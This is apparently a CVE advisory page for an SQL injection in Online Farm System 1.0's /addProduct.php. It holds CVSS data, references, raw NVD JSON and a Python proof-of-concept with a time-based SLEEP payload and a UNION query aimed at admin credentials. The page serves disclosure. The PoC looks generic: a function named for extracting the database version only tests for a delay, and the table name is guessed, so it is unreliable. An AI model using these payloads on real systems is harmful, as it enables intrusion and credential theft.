CVE-2025-15049

Description

A vulnerability was identified in code-projects Online Farm System 1.0. Affected is an unknown function of the file /addProduct.php. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:anisha:online_farm_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Farm System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15049 PoC - SQL Injection in Online Farm System 1.0
# Target: /addProduct.php
# Parameter: Username

def exploit_sqli(url, payload):
    """
    SQL Injection PoC for CVE-2025-15049
    This demonstrates blind time-based SQL injection
    """
    target_url = f"{url}/addProduct.php"
    
    # Time-based blind SQL injection payload
    # Adjust sleep time based on database response
    data = {
        'Username': payload,
        'ProductName': 'TestProduct',
        'ProductPrice': '100'
    }
    
    try:
        response = requests.post(target_url, data=data, timeout=30)
        return response
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

def extract_database_version(url):
    """
    Extract MySQL version using time-based blind SQL injection
    """
    # Payload to extract database version
    payload = "admin' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -"
    print(f"[*] Sending payload to extract database info...")
    response = exploit_sqli(url, payload)
    if response and response.elapsed.total_seconds() > 5:
        print("[+] SQL Injection confirmed! Database is vulnerable.")
        return True
    return False

def extract_admin_credentials(url):
    """
    Extract admin credentials using UNION-based injection
    """
    # UNION-based SQL injection to extract admin data
    payload = "admin' UNION SELECT username,password FROM admin_users-- -"
    print(f"[*] Extracting admin credentials...")
    response = exploit_sqli(url, payload)
    return response

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15049.py <target_url>")
        print("Example: python cve-2025-15049.py http://target.com/farm")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print(f"[*] Target: {target}")
    print(f"[*] CVE-2025-15049 SQL Injection PoC")
    print(f"[*] Exploiting: {target}/addProduct.php")
    
    if extract_database_version(target):
        print("[+] Vulnerability confirmed!")
        print("[*] Next steps: Extract sensitive data using SQL injection")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15049
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15049
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15049/
[4] VulDB https://vuldb.com/cve/CVE-2025-15049
[5] https://code-projects.org/
[6] https://github.com/xiaotsai/tttt/issues/1
[7] https://vuldb.com/?ctiid.337854
[8] https://vuldb.com/?id.337854
[9] https://vuldb.com/?submit.721001

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15049", "sourceIdentifier": "[email protected]", "published": "2025-12-23T23:15:44.440", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in code-projects Online Farm System 1.0. Affected is an unknown function of the file /addProduct.php. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anisha:online_farm_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DFF9CED4-2D05-4CD4-A775-7203558F4206"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/xiaotsai/tttt/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.337854", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337854", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721001", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}